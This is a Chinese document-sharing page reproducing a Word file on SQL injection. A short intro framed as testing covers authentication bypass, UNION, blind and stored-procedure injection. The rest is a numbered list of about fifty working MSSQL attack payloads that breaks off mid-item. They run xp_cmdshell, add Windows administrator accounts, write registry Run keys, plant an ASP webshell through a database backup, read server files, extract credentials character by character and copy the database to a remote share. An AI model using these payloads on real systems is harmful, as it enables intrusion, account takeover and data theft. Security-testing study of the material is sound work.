常用Sql注入语句.docx
- 文档编号:8689340
- 上传时间:2023-02-01
- 格式:DOCX
- 页数:15
- 大小:28.96KB
常用Sql注入语句.docx
《常用Sql注入语句.docx》由会员分享,可在线阅读,更多相关《常用Sql注入语句.docx(15页珍藏版)》请在冰豆网上搜索。
常用Sql注入语句
如何防范SQL注入<测试篇>
文章分类:
软件开发管理关键字:
sql注入
前一篇是关于编程防止SQL注入的文章,那么这篇就是从测试来进行测试SQL注入。
首先,看看SQL注入攻击能分为以下三种类型:
Inband:
数据经由SQL代码注入的通道取出,这是最直接的一种攻击,通过SQL注入获取的信息直接反映到应用程序的Web页面上;
Out-of-band:
数据通过不同于SQL代码注入的方法获得(譬如通过邮件等)
推理:
这种攻击时说并没有真正的数据传输,但攻击者可以通过发送特定的请求,重组返回的结果从而得到一些信息。
不论是哪种SQL注入,攻击者都需要构造一个语法正确的SQL查询,如果应用程序对一个不正确的查询返回了一个错误消息,那么就很容易重新构造初始的查询语句的逻辑,进而也就能更容易的进行注入;如果应用程序隐藏了错误信息,那么攻击者就必须对查询逻辑进行反向工程,即我们所谓的“盲SQL注入”
黑盒测试及其示例:
这个测试的第一步是理解我们的应用程序在什么时候需要访问数据库,典型的需要方法数据库的时机是:
认证表单:
输入用户名和密码以检查是否有权限
搜索引擎:
提交字符串以从数据库中获取相应的记录
电子商务站点:
获取某类商品的价格等信息
作为测试人员,我们需要列对所有输入域的值可能用于查询的字段做一个表单,包括那些POST请求的隐含字段,然后截取查询语句并产生错误信息。
第一个测试往往是用一个单引号“'”或者分号“;”,前者在SQL中是字符串终结符,如果应用程序没有过滤,则会产生一条错误信息;后者在SQL中是一条SQL语句的终结符,同样如果没有过滤,也会产生错误信息。
同样可用于测试的还有“--”以及SQL中的一些诸如“AND”的关键字,通常很常见的一种测试是在要求输入为数字的输入框中输入字符串。
通过上面的测试输入返回的错误信息能够让我们知道很多数据库的信息。
这时候就需要“盲目SQL注入”了。
注意,我们需要多所有可能存在的SQL注入漏洞的输入域进行测试,并且在,每个测试用例时只变化一个域的值,从而才能找到真正存在漏洞的输入域。
下面看看一些常用例测试的SQL注入语句。
引用
SELECT*FROMUsersWHEREUsername='$username'ANDPassword='$password'
我们针对上面的SQL语句分析,发现如果用下面的测试数据就能够进行SQL注入了
引用
$username=1'or'1'='1
$password=1'or'1'='1
看看整个SQL查询语句变成:
引用
SELECT*FROMUsersWHEREUsername='1'OR'1'='1'ANDPassword='1'OR'1'='1'
假设参数值是通过GET方法传递到服务器的,且域名为那么我们的访问请求就是:
引用
对上面的SQL语句作简单分析后我们就知道由于该语句永远为真,所以肯定会返回一些数据,在这种情况下实际上并未验证用户名和密码,并且在某些系统中,用户表的第一行记录是管理员,那这样造成的后果则更为严重。
另外一个查询的例子如下:
引用
SELECT*FROMUsersWHERE((Username='$username')AND(Password=MD5('$password')))
在这个例子中,存在两个问题,一个是括号的用法,还有一个是MD5哈希函数的用法。
对于第一个问题,我们很容找出缺少的右括号解决,对于第二个问题,我们可以想办法使第二个条件失效。
我们在查询语句的最后加上一个注释符以表示后面的都是注释,常见的注释起始符是/*(在Oracle中是--),也就是说,我们用如下的用户名和密码:
引用
$username=1'or'1'='1'))/*
$password=foo
那么整条SQL语句就变为:
引用
SELECT*FROMUsersWHERE((Username='1'or'1'='1'))/*')AND(Password=MD5('$password')))
那么看看URL请求就变为:
引用
Union查询SQL注入测试
还有一种测试是利用Union的,利用Union可以连接查询,从而从其他表中得到信息,假设如下查询:
引用
SELECTName,Phone,AddressFROMUsersWHEREId=$id
然后我们设置id的值为:
引用
$id=1UNIONALLSELECTcreditCardNumber,1,1FROMCreditCarTable
那么整体的查询就变为:
引用
SELECTName,Phone,AddressFROMUsersWHEREId=1UNIONALLSELECTcreaditCardNumber,1,1FROMCreditCarTable
显示这就能得到所有信用卡用户的信息。
盲目SQL注入测试
在上面我们提到过盲SQL注入,即bindSQLInjection,它意味着对于某个操作我们得不到任何信息,通常这是由于程序员已经编写了特定的出错返回页面,从而隐藏了数据库结构的信息。
但利用推理方法,有时候我们能够恢复特定字段的值。
这种方法通常采用一组对服务器的布尔查询,依据返回的结果来推断结果的含义。
仍然延续上面的有一个参数名为id,那么我们输入以下url请求:
引用
显然由于语法错误,我们会得到一个预先定义好的出错页面,假设服务器上的查询语句为
引用
SELECTfield1,field2,field3FROMUsersWHEREId='$Id'
假设我们想要的带哦用户名字段的值,那么通过一些函数,我们就可以逐字符的读取用户名的值。
在这里我们使用以下的函数:
引用
SUBSTRING(text,start,length),ASCII(char),LENGTH(text)
我们定义id为:
引用
$Id=1'ANDASCII(SUBSTRING(username,1,1))=97AND'1'='1
那么最终的SQL查询语句为:
引用
SELECTfield1,field2,field3FROMUsersWHEREId='1'ANDASCII(SUBSTRING(username,1,1))=97AND'1'='1'
那么,如果在数据库中有用户名的第一字符的ASCII码为97的话,那么我们就能得到一个真值u,那么就继续寻找该用户名的下一个字符;如果没有的话,那么我们就增猜测第一个字符的ASCII码为98的用户名,这样反复下去就能判断出合法的用户名。
不过这样盲目SQL注入会要求使用大量的SQL尝试,有一些自动化的工具能够帮我们实现,SqlDumper就是这样的一种工具,对MySql数据库进行GET访问请求。
存储过程注入
如果在使用存储过程不当的时候,会造成一定的SQL注入漏洞。
以下面的SQL存储过程为例:
引用
Createprocedureuser_login
@usernamevarchar(20),
@passwordvarchar(20)AsDeclare@sqlstringvarchar(250)
Set@sqlstring=''
Select1fromusers
whereusername='+@username+'andpassword='+@password
exec(@sqlstring)
Go
测试的输入如下:
引用
anyusernameor1=1'
anypassword
如果程序没有对输入进行验证,那么上面的语句就返回数据库中的一条记录
我们再看下面的一条:
引用
Createprocedureget_report@columnamelistvarchar(7900)As
Declare@sqlstringvarchar(8000)
Set@sqlstring=‘
Select‘+@columnamelist+‘fromReportTable‘
exec(@sqlstring)
Go
如果测试输入是:
引用
1fromusers;updateuserssetpassword='password';select*
后面显而易见,用户的所有密码都被更且得到了报表信息。
1、返回的是连接的数据库名
anddb_name()>0
2、作用是获取连接用户名
anduser>0
3、将数据库备份到Web目录下面
;backupdatabase数据库名todisk='c:
\inetpub\wwwroot\1.db';--
4、显示SQL系统版本
and1=(select@@VERSION)或and1=convert(int,@@version)--
5、判断xp_cmdshell扩展存储过程是否存在
and1=(SELECTcount(*)FROMmaster.dbo.sysobjectsWHERExtype='X'ANDname='xp_cmdshell')
6、恢复xp_cmdshell扩展存储的命令
;execmaster.dbo.sp_addextendedproc'xp_cmdshell','e:
\inetput\web\xplog70.dll';--
7、向启动组中写入命令行和执行程序
;EXECmaster.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\
Run','help1','REG_SZ','cmd.exe/cnetusertestptlove/add'
8、查看当前的数据库名称
and0<>db_name(n)n改成0,1,2,3……就可以跨库了或and1=convert(int,db_name())--
9、不需xp_cmdshell支持在有注入漏洞的SQL服务器上运行CMD命令(同第76)
10、则把得到的数据内容全部备份到WEB目录下
;backupdatabase数据库名todisk='c:
\inetpub\wwwroot\save.db'
11、通过复制CMD创建UNICODE漏洞
;execmaster.dbo.xp_cmdshell"copyc:
\winnt\system32\cmd.exe c:
\inetpub\scripts\cmd.exe"
12、遍历系统的目录结构,分析结果并发现WEB虚拟目录
先创建一个临时表:
temp;createtabletemp(idnvarchar(255),num1nvarchar(255),num2nvarchar(255),num3nvarchar(255));--
(1)利用xp_availablemedia来获得当前所有驱动器,并存入temp表中 ;inserttempexecmaster.dbo.xp_availablemedia;--
通过查询temp的内容来获得驱动器列表及相关信息
(2)利用xp_subdirs获得子目录列表,并存入temp表中 ;insertintotemp(id)execmaster.dbo.xp_subdirs'c:
\';--
(3)还可以利用xp_dirtree获得所有子目录的目录树结构,并寸入temp表中 ;insertintotemp(id,num1)execmaster.dbo.xp_dirtree'c:
\';--(实验成功)
13、查看某个文件的内容,可以通过执行xp_cmdsell
;insertintotemp(id)execmaster.dbo.xp_cmdshell'typec:
\web\index.asp';--
14、将一个文本文件插入到一个临时表中
;bulkinserttemp(id)from'c:
\inetpub\wwwroot\index.asp'
15、每完成一项浏览后,应删除TEMP中的所有内容,删除方法是:
;deletefromtemp;--
16、浏览TEMP表的方法是:
and(selecttop1idfromTestDB.dbo.temp)>0假设TestDB是当前连接的数据库名
17、猜解所有数据库名称
and(selectcount(*)frommaster.dbo.sysdatabaseswherename>1anddbid=6)<>0 dbid=6,7,8分别得到其它库名
18、猜解数据库中用户名表的名称
and(selectcount(*)fromTestDB.dbo.表名)>0若表名存在,则abc.asp工作正常,否则异常。
如此循环,直到猜到系统帐号表的名称。
19、判断是否是sysadmin权限
and1=(SELECTIS_SRVROLEMEMBER('sysadmin'))
20、判断是否是SA用户
'sa'=(SELECTSystem_user)
21、查看数据库角色
;usemodel--
22、查看库名
and0<>(selectcount(*)frommaster.dbo.sysdatabaseswherename>1anddbid=6)--
23、获得第一个用户建立表的名称
and(selecttop1namefromTestDB.dbo.sysobjectswherextype='U'andstatus>0)>0 假设要获得数据库是TestDB.dbo
24、获得第二个用户建立的表的名称
and(selecttop1namefromTestDB.dbo.sysobjectswherextype='U'andstatus>0andnamenotin('xyz'))>0
25、获得第三个用户建立的表的名称
and(selecttop1namefromTestDB.dbo.sysobjectswherextype='U'andstatus>0andnamenotin('xyz',''))>0 ''中为第二个用户名
26、获得第四个用户建立的表的名称
and(selecttop1namefromTestDB.dbo.sysobjectswherextype='U'andstatus>0andnamenotin('xyz','',''))>0 '',''中为第二,三个用户名
27、获得表中记录的条数
and(selectcount(*)from表名)<5记录条数小于5 或 <10记录条数小于10 ……等等
28、测试权限结构(mssql)
and1=(SELECTIS_SRVROLEMEMBER('sysadmin'));--
and1=(SELECTIS_SRVROLEMEMBER('serveradmin'));--
and1=(SELECTIS_SRVROLEMEMBER('setupadmin'));--
and1=(SELECTIS_SRVROLEMEMBER('securityadmin'));--
and1=(SELECTIS_SRVROLEMEMBER('diskadmin'));--
and1=(SELECTIS_SRVROLEMEMBER('bulkadmin'));--
and1=(SELECTIS_MEMBER('db_owner'));--
29、添加mssql和系统的帐户
;execmaster.dbo.sp_addloginusername;--
;execmaster.dbo.sp_passwordnull,username,password;--
;execmaster.dbo.sp_addsrvrolemembersysadminusername;--
;execmaster.dbo.xp_cmdshell'netuserusernamepassword/workstations:
*/times:
all/passwordchg:
yes/passwordreq:
yes/active:
yes/add';--
;execmaster.dbo.xp_cmdshell'netuserusernamepassword/add';--
;execmaster.dbo.xp_cmdshell'netlocalgroupadministratorsusername/add';--
30、简洁的webshell
usemodel
createtablecmd(strimage);
insertintocmd(str)values('<%=server.createobject("wscript.shell").exec("cmd.exe/c"&request("c")).stdout.readall%>');
backupdatabasemodeltodisk='g:
\wwwtest\l.asp';
请求的时候,像这样子用:
http:
//ip/l.asp?
c=dir
31、猜解字段名称
猜解法:
and(selectcount(字段名)from表名)>0 若“字段名”存在,则返回正常
读取法:
and(selecttop1col_name(object_id('表名'),1)fromsysobjects)>0 把col_name(object_id('表名'),1)中的1依次换成2,3,4,5,6…就可得到所有的字段名称。
32、猜解用户名与密码
ASCII码逐字解码法:
基本的思路是先猜出字段的长度,然后依次猜出每一位的值
and(selecttop1len(username)fromadmin)=X(X=1,2,3,4,5,…n,假设:
username为用户名字段的名称,admin为表的名称 若x为某一值i且abc.asp运行正常时,则i就是第一个用户名的长度。
and(selecttop1ascii(substring(username,m,1))fromadmin)=n (m的值在上一步得到的用户名长度之间,当m=1,2,3,…时猜测分别猜测第1,2,3,…位的值;n的值是1~9、a~z、A~Z的ASCII值,也就是1~128之间的任意值;admin为系统用户帐号表的名称),
33、建立数据表
;createtable表名(列名1数据类型,列名2数据类型);--
34、向表格中插入数据
;insertinto表名(列名1,列名2,……)values('值1','值2'……);--
35、更新记录
update表名set列名1='值'……where……
36、删除记录
deletefrom表名where……
37、删除数据库表格
droptable表名
38、将文本文件导入表
使用'bulkinsert'语法可以将一个文本文件插入到一个临时表中。
简单地创建这个表:
createtablefoo(linevarchar(8000))
然后执行bulkinsert操作把文件中的数据插入到表中,如:
bulkinsertfoofrom'c:
\inetpub\wwwroot\process_login.asp'
39、备份当前数据库的命令:
declare@asysname;set@a=db_name();backupdatabase@atodisk='你的IP你的共享目录bak.dat',name='test';--
40、使用sp_makewebtask处理过程的相关请求写入URL
;EXECmaster..sp_makewebtask"\\10.10.1.3\share\output.html","SELECT*FROMINFORMATION_SCHEMA.TABLES"
41、将获得SQLSERVER进程的当前工作目录中的目录列表
Execmaster..xp_cmdshell'dir'
42、将提供服务器上所有用户的列表
Execmaster..xp_cmdshell'netuser'
43、读注册表存储过程
execxp_regreadHKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters','nullsessionshares'
44、xp_servicecontrol过程允许用户启动,停止,暂停和继续服务
execmaster..xp_servicecontrol'start','schedule'
execmaster..xp_servicecontrol'start','server'
45、显示机器上有用的驱动器
Xp_availablemedia
46、允许获得一个目录树
Xp_dirtree
47、提供进程的进程ID,终止此进程
Xp_terminate_process
48、恢复xp_cmdshell
Execmaster.dbo.addextendedproc'xp_cmdshell','xplog70.dll'
49、堵上cmdshell的SQL语句
sp_dropextendedproc"xp_cmdshell"
50、不需要XP_CMDSHLL直接添加系统帐号,对XPLOG70.DLL被删很有效
declare@shellintexecsp_oacreate'wscrip
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 常用 Sql 注入 语句